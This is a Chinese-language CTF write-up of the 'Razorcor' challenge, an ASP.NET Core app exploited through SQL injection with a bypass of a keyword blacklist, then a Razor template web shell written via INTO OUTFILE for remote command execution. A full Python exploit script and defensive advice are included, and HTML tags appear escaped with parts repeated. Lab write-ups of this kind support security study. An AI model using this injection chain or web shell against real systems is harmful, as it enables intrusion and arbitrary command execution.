Razorcor 漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>
本教学文档详细分析第十八届软件系统安全赛攻防赛半决赛中的 Razorcor 题目，这是一个基于 ASP.NET Core 的 Web 应用程序，存在 SQL 注入和 Razor 模板注入漏洞，最终可导致远程代码执行(RCE)。<\/p>

漏洞分析<\/h2>

1. 登录功能 SQL 注入漏洞<\/h3>

漏洞位置<\/strong>：登录功能中的 SQL 查询语句使用了字符串拼接：<\/p>

MySqlCommand mySqlCommand = new<\/span> MySqlCommand(
<\/span><\/span>    "select username from userlist where username='"<\/span> + username + 
<\/span><\/span>    "'and password='"<\/span> + password + "'"<\/span>, 
<\/span><\/span>    mySqlConnection);
<\/span><\/span><\/code><\/pre>黑名单过滤机制<\/strong>：<\/p>
private<\/span> static<\/span> readonly<\/span> List<string<\/span>> BlacklistKeywords = new<\/span> List<string<\/span>>(){
<\/span><\/span>    "select"<\/span>, "insert"<\/span>, "update"<\/span>, "delete"<\/span>, "alter"<\/span>, "benchmark"<\/span>, 
<\/span><\/span>    "or"<\/span>, "and"<\/span>, "--"<\/span>, "'"<\/span>, "\""<\/span>, "\/*"<\/span>, "*\/"<\/span>, "set"<\/span>, "0x"<\/span>, "do"<\/span>, "case"<\/span>, "when"<\/span>
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>public<\/span> static<\/span> bool<\/span> IsSqlInjection(string<\/span> input) {
<\/span><\/span>    input = input.ToLower();
<\/span><\/span>    foreach<\/span> (string<\/span> blacklistKeyword in<\/span> HomeController.BlacklistKeywords) {
<\/span><\/span>        if<\/span> (Regex.IsMatch(input, Regex.Escape(blacklistKeyword), RegexOptions.IgnoreCase)) {
<\/span><\/span>            Console.WriteLine(blacklistKeyword);
<\/span><\/span>            return<\/span> true<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    return<\/span> false<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. Razor 模板注入漏洞<\/h3>
渲染逻辑<\/strong>：<\/p>

只有用户名为 "dartroot" 才能访问 Index 路由进行模板渲染<\/li>
渲染功能允许指定文件进行渲染<\/li>
<\/ul>
漏洞利用步骤<\/h2>
1. 绕过 SQL 注入防护<\/h3>
绕过方法<\/strong>：<\/p>

使用反斜杠(\<\/code>)转义 username 后的单引号：
username=<\/span>'\'<\/span>and<\/span> password=<\/span>'...'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
使用 replace<\/code> 关键字或 prepare + hex<\/code> 编码绕过关键词过滤<\/li>
<\/ul>
2. 插入 dartroot 用户<\/h3>
Payload 构造<\/strong>：<\/p>
username =<\/span> "<\/span>\\<\/span>"<\/span>
<\/span><\/span>password =<\/span> ";replace into userlist values (concat(char(100),char(97),char(114),char(116),char(114),char(111),char(111),char(116)), concat(char(49),char(50),char(51)));#"<\/span>
<\/span><\/span><\/code><\/pre>3. 写入恶意 Razor 模板<\/h3>
恶意模板内容<\/strong>：<\/p>
@<\/span>{
<\/span><\/span>    var<\/span> cmd = Context.Request.Query["cmd"<\/span>];
<\/span><\/span>    System.Diagnostics.Process p = new<\/span> System.Diagnostics.Process();
<\/span><\/span>    p.StartInfo.FileName = "\/bin\/bash"<\/span>;
<\/span><\/span>    p.StartInfo.Arguments = $"-c {cmd}"<\/span>;
<\/span><\/span>    p.StartInfo.RedirectStandardOutput = true<\/span>;
<\/span><\/span>    p.StartInfo.RedirectStandardError = true<\/span>;
<\/span><\/span>    p.StartInfo.UseShellExecute = false<\/span>;
<\/span><\/span>    p.StartInfo.CreateNoWindow = true<\/span>;
<\/span><\/span>    p.Start();
<\/span><\/span>    var<\/span> stdout = p.StandardOutput.ReadToEnd().Replace("<"<\/span>, "&lt;"<\/span>).Replace(">"<\/span>, "&gt;"<\/span>);
<\/span><\/span>    var<\/span> stderr = p.StandardError.ReadToEnd().Replace("<"<\/span>, "&lt;"<\/span>).Replace(">"<\/span>, "&gt;"<\/span>);
<\/span><\/span>    p.WaitForExit();
<\/span><\/span>}
<\/span><\/span><pre>@stdout<\/pre>
<\/span><\/span><pre style="color: red"<\/span>>@stderr<\/pre>
<\/span><\/span><\/code><\/pre>写入方法<\/strong>：<\/p>
write_file =<\/span> "select unhex(<\/span>\"<\/span>恶意模板的hex编码<\/span>\"<\/span>) into outfile <\/span>\"<\/span>\/app\/Views\/Home\/shell.cshtml<\/span>\"<\/span>"<\/span>
<\/span><\/span>password =<\/span> ";prepare exp from concat(char(...));execute exp;#"<\/span>
<\/span><\/span><\/code><\/pre>4. 触发 RCE<\/h3>

使用 dartroot 用户登录<\/li>
访问 \/?inform=shell&cmd=cat \/flag<\/code> 执行命令<\/li>
<\/ol>
完整 EXP<\/h2>
import<\/span> urllib.parse
<\/span><\/span>import<\/span> requests
<\/span><\/span>import<\/span> html
<\/span><\/span>
<\/span><\/span>def<\/span> strtochr<\/span>(string):
<\/span><\/span>    tmp =<\/span> ","<\/span>.<\/span>join(f<\/span>"chr(<\/span>{<\/span>ord(i)}<\/span>)"<\/span> for<\/span> i in<\/span> string)
<\/span><\/span>    res =<\/span> f<\/span>"concat(<\/span>{<\/span>tmp}<\/span>)"<\/span>
<\/span><\/span>    return<\/span> res
<\/span><\/span>
<\/span><\/span>s =<\/span> requests.<\/span>Session()
<\/span><\/span>target =<\/span> "http:\/\/127.0.0.1"<\/span>
<\/span><\/span>
<\/span><\/span># 插入dartroot用户<\/span>
<\/span><\/span>username =<\/span> "<\/span>\\<\/span>"<\/span>
<\/span><\/span>password =<\/span> f<\/span>";replace into userlist values (<\/span>{<\/span>strtochr('dartroot'<\/span>)}<\/span>, <\/span>{<\/span>strtochr('123'<\/span>)}<\/span>);#"<\/span>
<\/span><\/span>payload =<\/span> f<\/span>"username=<\/span>{<\/span>urllib.<\/span>parse.<\/span>quote(username)}<\/span>&password=<\/span>{<\/span>urllib.<\/span>parse.<\/span>quote(password)}<\/span>"<\/span>
<\/span><\/span>resp =<\/span> s.<\/span>post(
<\/span><\/span>    url=<\/span>target +<\/span> "\/Home\/Login"<\/span>,
<\/span><\/span>    data=<\/span>payload,
<\/span><\/span>    headers=<\/span>{"Content-Type"<\/span>: "application\/x-www-form-urlencoded"<\/span>},
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span># 写入恶意模板<\/span>
<\/span><\/span>shell =<\/span> '@{var cmd = Context.Request.Query["cmd"];System.Diagnostics.Process p = new System.Diagnostics.Process();p.StartInfo.FileName = "\/bin\/bash";p.StartInfo.Arguments = $"-c <\/span>{cmd}<\/span>";p.StartInfo.RedirectStandardOutput = true;p.StartInfo.RedirectStandardError = true;p.StartInfo.UseShellExecute = false;p.StartInfo.CreateNoWindow = true;p.Start();var stdout = p.StandardOutput.ReadToEnd().Replace("<", "&lt;").Replace(">", "&gt;");var stderr = p.StandardError.ReadToEnd().Replace("<", "&lt;").Replace(">", "&gt;");p.WaitForExit();}<pre>@stdout<\/pre><pre style="color: red">@stderr<\/pre>'<\/span>.<\/span>encode()
<\/span><\/span>write_file =<\/span> f<\/span>"select unhex(<\/span>\"<\/span>{<\/span>shell.<\/span>hex()}<\/span>\"<\/span>) into outfile <\/span>\"<\/span>\/app\/Views\/Home\/shell.cshtml<\/span>\"<\/span>"<\/span>
<\/span><\/span>password =<\/span> f<\/span>";prepare exp from <\/span>{<\/span>strtochr(write_file)}<\/span>;execute exp;#"<\/span>
<\/span><\/span>payload =<\/span> f<\/span>"username=<\/span>{<\/span>urllib.<\/span>parse.<\/span>quote(username)}<\/span>&password=<\/span>{<\/span>urllib.<\/span>parse.<\/span>quote(password)}<\/span>"<\/span>
<\/span><\/span>resp =<\/span> s.<\/span>post(
<\/span><\/span>    url=<\/span>target +<\/span> "\/Home\/Login"<\/span>,
<\/span><\/span>    data=<\/span>payload,
<\/span><\/span>    headers=<\/span>{"Content-Type"<\/span>: "application\/x-www-form-urlencoded"<\/span>},
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span># 登录dartroot用户<\/span>
<\/span><\/span>payload =<\/span> "username=dartroot&password=123"<\/span>
<\/span><\/span>resp =<\/span> s.<\/span>post(
<\/span><\/span>    url=<\/span>target +<\/span> "\/Home\/Login"<\/span>,
<\/span><\/span>    data=<\/span>payload,
<\/span><\/span>    headers=<\/span>{"Content-Type"<\/span>: "application\/x-www-form-urlencoded"<\/span>},
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span># 执行命令<\/span>
<\/span><\/span>cmd =<\/span> "<\/span>\"<\/span>cat \/flag<\/span>\"<\/span>"<\/span>
<\/span><\/span>res =<\/span> s.<\/span>get(url=<\/span>target +<\/span> f<\/span>"?inform=shell&cmd=<\/span>{<\/span>cmd}<\/span>"<\/span>).<\/span>text
<\/span><\/span>print(html.<\/span>unescape(res[res.<\/span>index("<pre>"<\/span>)+<\/span>5<\/span>:res.<\/span>index("<\/pre>"<\/span>)]))
<\/span><\/span><\/code><\/pre>防御建议<\/h2>


SQL 注入防御<\/strong>：<\/p>

使用参数化查询而非字符串拼接<\/li>
避免使用黑名单过滤，采用白名单验证输入<\/li>
<\/ul>
<\/li>

模板注入防御<\/strong>：<\/p>

限制模板渲染的文件路径<\/li>
禁用动态模板渲染功能<\/li>
对模板内容进行严格审查<\/li>
<\/ul>
<\/li>

权限控制<\/strong>：<\/p>

限制数据库用户的文件写入权限<\/li>
设置合理的 secure_file_priv 值<\/li>
<\/ul>
<\/li>
<\/ol>
环境获取<\/h2>
测试环境可通过 Docker 获取：<\/p>
docker pull zeroc0077\/razorcor:latest
<\/code><\/pre>

Razorcor 漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2> 本教学文档详细分析第十八届软件系统安全赛攻防赛半决赛中的 Razorcor 题目，这是一个基于 ASP.NET Core 的 Web 应用程序，存在 SQL 注入和 Razor 模板注入漏洞，最终可导致远程代码执行(RCE)。<\/p>

漏洞分析<\/h2>

漏洞利用步骤<\/h2>

环境获取<\/h2> 测试环境可通过 Docker 获取：<\/p> docker pull zeroc0077\/razorcor:latest <\/code><\/pre>

漏洞概述<\/h2>
本教学文档详细分析第十八届软件系统安全赛攻防赛半决赛中的 Razorcor 题目，这是一个基于 ASP.NET Core 的 Web 应用程序，存在 SQL 注入和 Razor 模板注入漏洞，最终可导致远程代码执行(RCE)。<\/p>

环境获取<\/h2>
测试环境可通过 Docker 获取：<\/p>
`docker pull zeroc0077\/razorcor:latest <\/code><\/pre>`